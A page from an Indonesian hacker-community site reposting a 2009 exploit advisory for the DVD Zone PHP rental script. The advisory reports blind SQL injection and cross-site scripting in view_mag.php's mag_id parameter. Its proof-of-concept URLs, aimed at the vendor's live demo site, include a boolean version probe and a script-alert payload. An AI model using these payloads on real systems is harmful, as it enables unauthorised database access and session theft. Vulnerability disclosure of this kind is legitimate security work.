www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 6
0 Members | 6 Guests
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
914
Exploits
Semua Hasil Exploitasi bisa dicheck disini
Info

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Linker's Friends


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat

mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel[at]sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini



Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline


 "Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …"

SekuritiOnline T-Shirt V2 Ready Stock !!!
http://shop.sekuritionline.net
Search Engine
Key Word(s): Search By:  
Current Time/Date
September 9, 2010, 6:56 am
Articles
DVD Zone view_mag.php?mag_id= (BSQL/XSS) Multiple Remote Vulnerabilities
By OoN_Boy
Published: October 14, 2009
Print   
[x]========================================================================================================================================[x]
|                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
| Title            : DVD Zone view_mag.php?mag_id= (BSQL/XSS) Multiple Remote Vulnerabilities                        |
| Software         : DVD Zone Boast Your DVD Rental Business                                        |
| Vendor           : http://www.vastal.com/                                                |
| Demo            : http://dvdzone.vastal.com                                                |
| Price        : $399.99                                                        |
| Date            : 22 September 2009 ( Indonesia )                                            |
| Author           : OoN_Boy                                                        |
| Contact          : oon.boy9@gmail.com                                                    |
| Web                : http://oonboy.info                                                    |
| Blog             : http://oonboy.blogspot.com                                                |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
| Description         : You can boast the revenue generated by your DVD Rental Business by allowing the users to order online. We have    |
|              provided many features which can be really useful for the users who may wish to rent a DVD. They can add a DVD in |
|              their wish list and can move the DVD's on their wish list up or down depending on the priority on which they want |
|              to rent that DVD. They can see the DVD's which have been sent to them and are on their hands by just visiting     |
|              their account. So there is no delay in returning them. You have full control of the genres you want to use through|
|              our extensive admin panel. You can add as many DVD's as you want with just a click. You have full control over the|
|              CMS of the website, you can edit it on the fly. We have provided a HTML WYSIWYG Editor so you do not have to do   |
|              any kind pf programming. Please check out the demo site to see the script in action                    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
| Google Dork         : uh  ah  oh....                                                    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
| Exploit         : http://localhost/[path]/view_mag.php?mag_id=[sql]                                      |
|            : http://localhost/[path]/view_mag.php?mag_id=[xss]
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
| Proof of concept    : http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True                    |
|              http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False                    |
|              http://dvdzone.vastal.com/view_mag.php?mag_id=<script>alert(123)</script>
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
| Greetz        : antisecurity.org batamhacker.or.id                                                                                |
|               Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
|                 k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
| Note            : Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all             |
|              kabur.... untuk sementara waktu.... bye bye.....                                    |
[x]========================================================================================================================================[x]

View Comments (0)
Powered by SO Community @ 2004 - 2011
Segala sesuatu yang dapat ditimbulkan oleh artikel disini kami tidak bertanggung jawab
artikel yang terbit kami anggap sebagai wujud pembelajaran untuk kita semua